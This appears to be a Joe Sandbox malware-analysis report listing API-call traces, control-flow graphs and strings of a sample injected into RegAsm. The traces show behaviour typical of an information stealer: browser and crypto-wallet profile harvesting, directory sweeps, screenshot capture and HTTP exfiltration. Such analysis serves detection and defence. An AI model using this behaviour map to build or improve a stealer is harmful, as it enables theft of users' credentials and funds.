lstrlenA 79300->79301 79302 415389 79301->79302 79303 40f923 lstrcpy 79302->79303 79304 41539f 79303->79304 79305 4010b1 2 API calls 79304->79305 79306 4153b7 79305->79306 79759 414437 _EH_prolog 79306->79759 79308 4153c4 79309 401061 _EH_prolog 79308->79309 79310 4153ea 

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 555 417645-41764c 556 417652-417a25 GetProcAddress * 43 555->556 557 417a2a-417ac9 LoadLibraryA * 9 555->557 556->557 558 417b39-417b40 557->558 559 417acb-417b34 GetProcAddress * 5 557->559 560 417b46-417bf4 GetProcAddress * 8 558->560 561 417bf9-417c00 558->561 559->558 560->561 562 417c70-417c77 561->562 563 417c02-417c6b GetProcAddress * 5 561->563 564 417d02-417d09 562->564 565 417c7d-417cfd GetProcAddress * 6 562->565 563->562 566 417dd9-417de0 564->566 567 417d0f-417dd4 GetProcAddress * 9 564->567 565->564 568 417e50-417e57 566->568 569 417de2-417e4b GetProcAddress * 5 566->569 567->566 570 417e82-417e89 568->570 571 417e59-417e7d GetProcAddress * 2 568->571 569->568 572 417eb4-417ebb 570->572 573 417e8b-417eaf GetProcAddress * 2 570->573 571->570 574 417ec1-417f9b GetProcAddress * 10 572->574 575 417fa0-417fa7 572->575 573->572 574->575 576 418000-418007 575->576 577 417fa9-417ffb GetProcAddress * 4 575->577 578 418009-418016 GetProcAddress 576->578 579 41801b-418022 576->579 577->576 578->579 580 418024-418076 GetProcAddress * 4 579->580 581 41807b-418082 579->581 580->581 582 418095 581->582 583 418084-418090 GetProcAddress 581->583 583->582
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(76210000,00416AAC), ref: 00417659
                                                                            • GetProcAddress.KERNEL32 ref: 00417670
                                                                            • GetProcAddress.KERNEL32 ref: 00417687
                                                                            • GetProcAddress.KERNEL32 ref: 0041769E
                                                                            • GetProcAddress.KERNEL32 ref: 004176B5
                                                                            • GetProcAddress.KERNEL32 ref: 004176CC
                                                                            • GetProcAddress.KERNEL32 ref: 004176E3
                                                                            • GetProcAddress.KERNEL32 ref: 004176FA
                                                                            • GetProcAddress.KERNEL32 ref: 00417711
                                                                            • GetProcAddress.KERNEL32 ref: 00417728
                                                                            • GetProcAddress.KERNEL32 ref: 0041773F
                                                                            • GetProcAddress.KERNEL32 ref: 00417756
                                                                            • GetProcAddress.KERNEL32 ref: 0041776D
                                                                            • GetProcAddress.KERNEL32 ref: 00417784
                                                                            • GetProcAddress.KERNEL32 ref: 0041779B
                                                                            • GetProcAddress.KERNEL32 ref: 004177B2
                                                                            • GetProcAddress.KERNEL32 ref: 004177C9
                                                                            • GetProcAddress.KERNEL32 ref: 004177E0
                                                                            • GetProcAddress.KERNEL32 ref: 004177F7
                                                                            • GetProcAddress.KERNEL32 ref: 0041780E
                                                                            • GetProcAddress.KERNEL32 ref: 00417825
                                                                            • GetProcAddress.KERNEL32 ref: 0041783C
                                                                            • GetProcAddress.KERNEL32 ref: 00417853
                                                                            • GetProcAddress.KERNEL32 ref: 0041786A
                                                                            • GetProcAddress.KERNEL32 ref: 00417881
                                                                            • GetProcAddress.KERNEL32 ref: 00417898
                                                                            • GetProcAddress.KERNEL32 ref: 004178AF
                                                                            • GetProcAddress.KERNEL32 ref: 004178C6
                                                                            • GetProcAddress.KERNEL32 ref: 004178DD
                                                                            • GetProcAddress.KERNEL32 ref: 004178F4
                                                                            • GetProcAddress.KERNEL32 ref: 0041790B
                                                                            • GetProcAddress.KERNEL32 ref: 00417922
                                                                            • GetProcAddress.KERNEL32 ref: 00417939
                                                                            • GetProcAddress.KERNEL32 ref: 00417950
                                                                            • GetProcAddress.KERNEL32 ref: 00417967
                                                                            • GetProcAddress.KERNEL32 ref: 0041797E
                                                                            • GetProcAddress.KERNEL32 ref: 00417995
                                                                            • GetProcAddress.KERNEL32 ref: 004179AC
                                                                            • GetProcAddress.KERNEL32 ref: 004179C3
                                                                            • GetProcAddress.KERNEL32 ref: 004179DA
                                                                            • GetProcAddress.KERNEL32 ref: 004179F1
                                                                            • GetProcAddress.KERNEL32 ref: 00417A08
                                                                            • GetProcAddress.KERNEL32 ref: 00417A1F
                                                                            • LoadLibraryA.KERNEL32(00416AAC,?,00000040,00000064,0041366A,00412D12,?,0000002C,00000064,004135E9,00413626,?,00000024,00000064,Function_000135AC,00413295), ref: 00417A30
                                                                            • LoadLibraryA.KERNEL32 ref: 00417A41
                                                                            • LoadLibraryA.KERNEL32 ref: 00417A52
                                                                            • LoadLibraryA.KERNEL32 ref: 00417A63
                                                                            • LoadLibraryA.KERNEL32 ref: 00417A74
                                                                            • LoadLibraryA.KERNEL32 ref: 00417A85
                                                                            • LoadLibraryA.KERNEL32 ref: 00417A96
                                                                            • LoadLibraryA.KERNEL32 ref: 00417AA7
                                                                            • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00417AB7
                                                                            • GetProcAddress.KERNEL32(751E0000), ref: 00417AD2
                                                                            • GetProcAddress.KERNEL32 ref: 00417AE9
                                                                            • GetProcAddress.KERNEL32 ref: 00417B00
                                                                            • GetProcAddress.KERNEL32 ref: 00417B17
                                                                            • GetProcAddress.KERNEL32 ref: 00417B2E
                                                                            • GetProcAddress.KERNEL32(73F70000), ref: 00417B4D
                                                                            • GetProcAddress.KERNEL32 ref: 00417B64
                                                                            • GetProcAddress.KERNEL32 ref: 00417B7B
                                                                            • GetProcAddress.KERNEL32 ref: 00417B92
                                                                            • GetProcAddress.KERNEL32 ref: 00417BA9
                                                                            • GetProcAddress.KERNEL32 ref: 00417BC0
                                                                            • GetProcAddress.KERNEL32 ref: 00417BD7
                                                                            • GetProcAddress.KERNEL32 ref: 00417BEE
                                                                            • GetProcAddress.KERNEL32(753A0000), ref: 00417C09
                                                                            • GetProcAddress.KERNEL32 ref: 00417C20
                                                                            • GetProcAddress.KERNEL32 ref: 00417C37
                                                                            • GetProcAddress.KERNEL32 ref: 00417C4E
                                                                            • GetProcAddress.KERNEL32 ref: 00417C65
                                                                            • GetProcAddress.KERNEL32(76310000), ref: 00417C84
                                                                            • GetProcAddress.KERNEL32 ref: 00417C9B
                                                                            • GetProcAddress.KERNEL32 ref: 00417CB2
                                                                            • GetProcAddress.KERNEL32 ref: 00417CC9
                                                                            • GetProcAddress.KERNEL32 ref: 00417CE0
                                                                            • GetProcAddress.KERNEL32 ref: 00417CF7
                                                                            • GetProcAddress.KERNEL32(76910000), ref: 00417D16
                                                                            • GetProcAddress.KERNEL32 ref: 00417D2D
                                                                            • GetProcAddress.KERNEL32 ref: 00417D44
                                                                            • GetProcAddress.KERNEL32 ref: 00417D5B
                                                                            • GetProcAddress.KERNEL32 ref: 00417D72
                                                                            • GetProcAddress.KERNEL32 ref: 00417D89
                                                                            • GetProcAddress.KERNEL32 ref: 00417DA0
                                                                            • GetProcAddress.KERNEL32 ref: 00417DB7
                                                                            • GetProcAddress.KERNEL32 ref: 00417DCE
                                                                            • GetProcAddress.KERNEL32(75B30000), ref: 00417DE9
                                                                            • GetProcAddress.KERNEL32 ref: 00417E00
                                                                            • GetProcAddress.KERNEL32 ref: 00417E17
                                                                            • GetProcAddress.KERNEL32 ref: 00417E2E
                                                                            • GetProcAddress.KERNEL32 ref: 00417E45
                                                                            • GetProcAddress.KERNEL32(75670000), ref: 00417E60
                                                                            • GetProcAddress.KERNEL32 ref: 00417E77
                                                                            • GetProcAddress.KERNEL32(76AC0000), ref: 00417E92
                                                                            • GetProcAddress.KERNEL32 ref: 00417EA9
                                                                            • GetProcAddress.KERNEL32(6F500000), ref: 00417EC8
                                                                            • GetProcAddress.KERNEL32 ref: 00417EDF
                                                                            • GetProcAddress.KERNEL32 ref: 00417EF6
                                                                            • GetProcAddress.KERNEL32 ref: 00417F0D
                                                                            • GetProcAddress.KERNEL32 ref: 00417F24
                                                                            • GetProcAddress.KERNEL32 ref: 00417F3B
                                                                            • GetProcAddress.KERNEL32 ref: 00417F52
                                                                            • GetProcAddress.KERNEL32 ref: 00417F69
                                                                            • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00417F7F
                                                                            • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 00417F95
                                                                            • GetProcAddress.KERNEL32(75AE0000), ref: 00417FB0
                                                                            • GetProcAddress.KERNEL32 ref: 00417FC7
                                                                            • GetProcAddress.KERNEL32 ref: 00417FDE
                                                                            • GetProcAddress.KERNEL32 ref: 00417FF5
                                                                            • GetProcAddress.KERNEL32(76300000), ref: 00418010
                                                                            • GetProcAddress.KERNEL32(6D1A0000), ref: 0041802B
                                                                            • GetProcAddress.KERNEL32 ref: 00418042
                                                                            • GetProcAddress.KERNEL32 ref: 00418059
                                                                            • GetProcAddress.KERNEL32 ref: 00418070
                                                                            • GetProcAddress.KERNEL32(6CFB0000,SymMatchString), ref: 0041808A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad
                                                                            • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                            • API String ID: 2238633743-951535364
                                                                            • Opcode ID: e99d2a3dd66da67205f3114fc9aaaece5a66dc5c732b58a81b65daf475131747
                                                                            • Instruction ID: 5d64eb95f993e10cfffcd180ca7930ca50f89af3c14b7aa20224d1cce3759a27
                                                                            • Opcode Fuzzy Hash: e99d2a3dd66da67205f3114fc9aaaece5a66dc5c732b58a81b65daf475131747
                                                                            • Instruction Fuzzy Hash: 0042D97E811620EFEB929FA0FD48A653BB3F70AB01B147439FA0586231D7364865EF54

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00405151
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                              • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                              • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040539B
                                                                            • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 004053D2
                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00425AC8,00000000), ref: 004057CC
                                                                            • lstrlenA.KERNEL32(00000000), ref: 004057DD
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004057E7
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004057EE
                                                                            • lstrlenA.KERNEL32(00000000), ref: 004057FF
                                                                            • memcpy.MSVCRT ref: 00405810
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00405821
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040583A
                                                                            • memcpy.MSVCRT ref: 00405843
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405856
                                                                            • HttpSendRequestA.WININET(?,00000000,00000000), ref: 0040586A
                                                                            • InternetReadFile.WININET(?,?,000000C7,?), ref: 004058BE
                                                                            • InternetCloseHandle.WININET(?), ref: 004058C9
                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004053F7
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                            • InternetCloseHandle.WININET(?), ref: 004058D2
                                                                            • InternetCloseHandle.WININET(?), ref: 004058DB
                                                                            • StrCmpCA.SHLWAPI(?), ref: 00405213
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                                            • String ID: "$"$"$($------$------$------$------$build_id$mode
                                                                            • API String ID: 2237346945-1447386369

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040C67E
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00425B7B,00425B7A,00000000,?,00425CC4,?,?,00425B77,?,?,00000000), ref: 0040C71F
                                                                            • StrCmpCA.SHLWAPI(?,00425CC8,?,?,00000000), ref: 0040C786
                                                                            • StrCmpCA.SHLWAPI(?,00425CCC,?,?,00000000), ref: 0040C7A0
                                                                            • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00425CD0,?,?,00425B7E,?,?,00000000), ref: 0040C851
                                                                              • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                            • String ID: Brave$Google Chrome$H$Opera GX$Preferences$\BraveWallet\Preferences
                                                                            • API String ID: 3869166975-1816240570

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004153FB
                                                                            • wsprintfA.USER32 ref: 00415421
                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00415438
                                                                            • memset.MSVCRT ref: 0041544F
                                                                            • memset.MSVCRT ref: 0041545D
                                                                            • StrCmpCA.SHLWAPI(?,004267F4), ref: 0041547B
                                                                            • StrCmpCA.SHLWAPI(?,004267F8), ref: 00415495
                                                                            • wsprintfA.USER32 ref: 004154B9
                                                                            • StrCmpCA.SHLWAPI(?,00426516), ref: 004154CA
                                                                            • wsprintfA.USER32 ref: 004154F0
                                                                            • wsprintfA.USER32 ref: 00415504
                                                                            • memset.MSVCRT ref: 00415516
                                                                            • lstrcat.KERNEL32(?,?), ref: 00415528
                                                                            • strtok_s.MSVCRT ref: 00415561
                                                                            • memset.MSVCRT ref: 00415576
                                                                            • lstrcat.KERNEL32(?,?), ref: 0041558B
                                                                            • PathMatchSpecA.SHLWAPI(?,00000000), ref: 004155AE
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                              • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004156B0
                                                                            • strtok_s.MSVCRT ref: 004156E1
                                                                            • FindNextFileA.KERNELBASE(000000FF,?), ref: 00415804
                                                                            • FindClose.KERNEL32(000000FF), ref: 00415815
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologlstrcatlstrcpymemsetwsprintf$Find$Filestrtok_s$CloseFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                            • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                            • API String ID: 264515753-332874205

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            APIs
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBF688,00001000), ref: 6CC335D5
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC335E0
                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 6CC335FD
                                                                            • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC3363F
                                                                            • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC3369F
                                                                            • __aulldiv.LIBCMT ref: 6CC336E4
                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 6CC33773
                                                                            • EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC3377E
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC337BD
                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 6CC337C4
                                                                            • EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC337CB
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC33801
                                                                            • __aulldiv.LIBCMT ref: 6CC33883
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CC33902
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CC33918
                                                                            • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CC3394C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                            • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                            • API String ID: 301339242-3790311718

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004162B4
                                                                            • wsprintfA.USER32 ref: 004162D4
                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                            • StrCmpCA.SHLWAPI(?,004268B0), ref: 00416308
                                                                            • StrCmpCA.SHLWAPI(?,004268B4), ref: 00416322
                                                                            • wsprintfA.USER32 ref: 00416346
                                                                            • StrCmpCA.SHLWAPI(?,00426525), ref: 00416357
                                                                            • wsprintfA.USER32 ref: 00416374
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                              • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                              • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                              • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                              • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                              • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                              • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                            • wsprintfA.USER32 ref: 00416388
                                                                            • PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                            • lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                            • lstrcat.KERNEL32(?,004268CC), ref: 004163D9
                                                                            • lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                            • lstrcat.KERNEL32(?,004268D0), ref: 004163FB
                                                                            • lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                            • FindClose.KERNEL32(00000000), ref: 004165B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Filelstrcat$H_prologwsprintf$Find$CloseCreatelstrcpy$AllocFirstHandleLocalMatchNextObjectPathReadSingleSizeSpecThreadWait
                                                                            • String ID: %s\%s$%s\%s$%s\*
                                                                            • API String ID: 3254224521-445461498
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00411302
                                                                            • memset.MSVCRT ref: 00411328
                                                                            • GetDesktopWindow.USER32 ref: 0041135E
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0041136B
                                                                            • GetDC.USER32(00000000), ref: 00411372
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0041137C
                                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0041138D
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00411398
                                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004113B4
                                                                            • GlobalFix.KERNEL32(?), ref: 00411412
                                                                            • GlobalSize.KERNEL32(?), ref: 0041141E
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 004043AD: _EH_prolog.MSVCRT ref: 004043B2
                                                                              • Part of subcall function 004043AD: lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                              • Part of subcall function 004043AD: StrCmpCA.SHLWAPI(?,00425987,00425983,0042597B,00425977,00425976), ref: 004044A4
                                                                              • Part of subcall function 004043AD: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                            • SelectObject.GDI32(00000000,?), ref: 00411498
                                                                            • DeleteObject.GDI32(?), ref: 004114B3
                                                                            • DeleteObject.GDI32(00000000), ref: 004114BA
                                                                            • ReleaseDC.USER32(00000000,?), ref: 004114C4
                                                                            • CloseWindow.USER32(00000000), ref: 004114CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
                                                                            • String ID: image/jpeg
                                                                            • API String ID: 3067874393-3785015651
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00415AC7
                                                                            • wsprintfA.USER32 ref: 00415AEA
                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00415B01
                                                                            • StrCmpCA.SHLWAPI(?,0042687C), ref: 00415B23
                                                                            • StrCmpCA.SHLWAPI(?,00426880), ref: 00415B3D
                                                                            • lstrcat.KERNEL32(?,?), ref: 00415B72
                                                                            • lstrcat.KERNEL32(?), ref: 00415B85
